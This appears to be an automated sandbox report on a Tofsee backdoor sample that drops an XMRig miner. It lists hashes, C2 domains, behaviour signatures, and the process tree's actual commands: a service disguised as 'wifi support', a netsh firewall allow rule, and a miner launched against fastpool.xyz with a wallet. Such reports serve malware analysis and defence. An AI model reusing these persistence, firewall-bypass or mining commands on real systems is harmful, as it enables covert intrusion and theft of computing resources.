Analysis

  • max time kernel
    170s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    04-06-2022 21:22

General

  • Target

    12c020a71de01f1a8251fca4ac54e2bcb32e18a13d35dc12bde417c746337738.exe

  • Size

    197KB

  • MD5

    a1f56bfecb723eaaf37e244883fd9894

  • SHA1

    b747dd70ebbd7eac0142a6b268fd1231fff36b21

  • SHA256

    12c020a71de01f1a8251fca4ac54e2bcb32e18a13d35dc12bde417c746337738

  • SHA512

    092b4c7ce6aec0303a04e63889cfd6ec17b98a4e18aeec893316ef7cf13a8a7b4bfa90384ce2a4c52dbaf1a4080366cfeb863f459bec876aa405d9201c234f83

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\12c020a71de01f1a8251fca4ac54e2bcb32e18a13d35dc12bde417c746337738.exe
    "C:\Users\Admin\AppData\Local\Temp\12c020a71de01f1a8251fca4ac54e2bcb32e18a13d35dc12bde417c746337738.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3516
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rkkzmifo\
      2⤵
        PID:2848
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nmqokqri.exe" C:\Windows\SysWOW64\rkkzmifo\
        2⤵
          PID:2164
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create rkkzmifo binPath= "C:\Windows\SysWOW64\rkkzmifo\nmqokqri.exe /d\"C:\Users\Admin\AppData\Local\Temp\12c020a71de01f1a8251fca4ac54e2bcb32e18a13d35dc12bde417c746337738.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3564
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description rkkzmifo "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2996
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start rkkzmifo
          2⤵
          • Launches sc.exe
          PID:3068
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1460
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 1212
          2⤵
          • Program crash
          PID:1352
      • C:\Windows\SysWOW64\rkkzmifo\nmqokqri.exe
        C:\Windows\SysWOW64\rkkzmifo\nmqokqri.exe /d"C:\Users\Admin\AppData\Local\Temp\12c020a71de01f1a8251fca4ac54e2bcb32e18a13d35dc12bde417c746337738.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1856
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 216
          2⤵
          • Program crash
          PID:1688
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3516 -ip 3516
        1⤵
          PID:360
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3608 -ip 3608
          1⤵
            PID:2496

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\nmqokqri.exe
            Filesize

            14.0MB

            MD5

            ee85c7a999c66f8eb63f9726dbd66850

            SHA1

            f710e8412c31ceb282f76e5803308d4d46cb1a0b

            SHA256

            d3143bd79183c9c7987c2819f273ac45c8c305bcb5f988ac4bf1c2c2d86545be

            SHA512

            dcf920318a368ed01e93d58bf870a86c758f4423335f6595d990217303dc03c42875783762dc9e49c5a0ef4681c9578343a859f03ec80d5b4d2df1b0fecfc586

          • C:\Windows\SysWOW64\rkkzmifo\nmqokqri.exe
            Filesize

            14.0MB

            MD5

            ee85c7a999c66f8eb63f9726dbd66850

            SHA1

            f710e8412c31ceb282f76e5803308d4d46cb1a0b

            SHA256

            d3143bd79183c9c7987c2819f273ac45c8c305bcb5f988ac4bf1c2c2d86545be

            SHA512

            dcf920318a368ed01e93d58bf870a86c758f4423335f6595d990217303dc03c42875783762dc9e49c5a0ef4681c9578343a859f03ec80d5b4d2df1b0fecfc586

          • memory/1460-140-0x0000000000000000-mapping.dmp
          • memory/1856-170-0x00000000005B0000-0x00000000006A1000-memory.dmp
            Filesize

            964KB

          • memory/1856-175-0x00000000005B0000-0x00000000006A1000-memory.dmp
            Filesize

            964KB

          • memory/1856-169-0x0000000000000000-mapping.dmp
          • memory/2164-134-0x0000000000000000-mapping.dmp
          • memory/2848-133-0x0000000000000000-mapping.dmp
          • memory/2996-137-0x0000000000000000-mapping.dmp
          • memory/3068-138-0x0000000000000000-mapping.dmp
          • memory/3516-141-0x000000000096F000-0x000000000097D000-memory.dmp
            Filesize

            56KB

          • memory/3516-142-0x0000000000400000-0x00000000008FB000-memory.dmp
            Filesize

            5.0MB

          • memory/3516-132-0x0000000000400000-0x00000000008FB000-memory.dmp
            Filesize

            5.0MB

          • memory/3516-130-0x000000000096F000-0x000000000097D000-memory.dmp
            Filesize

            56KB

          • memory/3516-131-0x0000000002630000-0x0000000002643000-memory.dmp
            Filesize

            76KB

          • memory/3564-136-0x0000000000000000-mapping.dmp
          • memory/3608-147-0x000000000093B000-0x0000000000948000-memory.dmp
            Filesize

            52KB

          • memory/3608-148-0x0000000000400000-0x00000000008FB000-memory.dmp
            Filesize

            5.0MB

          • memory/3644-144-0x0000000000310000-0x0000000000325000-memory.dmp
            Filesize

            84KB

          • memory/3644-151-0x0000000002200000-0x000000000240F000-memory.dmp
            Filesize

            2.1MB

          • memory/3644-154-0x0000000000760000-0x0000000000766000-memory.dmp
            Filesize

            24KB

          • memory/3644-157-0x00000000019A0000-0x00000000019B0000-memory.dmp
            Filesize

            64KB

          • memory/3644-160-0x00000000019F0000-0x00000000019F5000-memory.dmp
            Filesize

            20KB

          • memory/3644-163-0x0000000007100000-0x000000000750B000-memory.dmp
            Filesize

            4.0MB

          • memory/3644-166-0x00000000025D0000-0x00000000025D7000-memory.dmp
            Filesize

            28KB

          • memory/3644-150-0x0000000000310000-0x0000000000325000-memory.dmp
            Filesize

            84KB

          • memory/3644-149-0x0000000000310000-0x0000000000325000-memory.dmp
            Filesize

            84KB

          • memory/3644-143-0x0000000000000000-mapping.dmp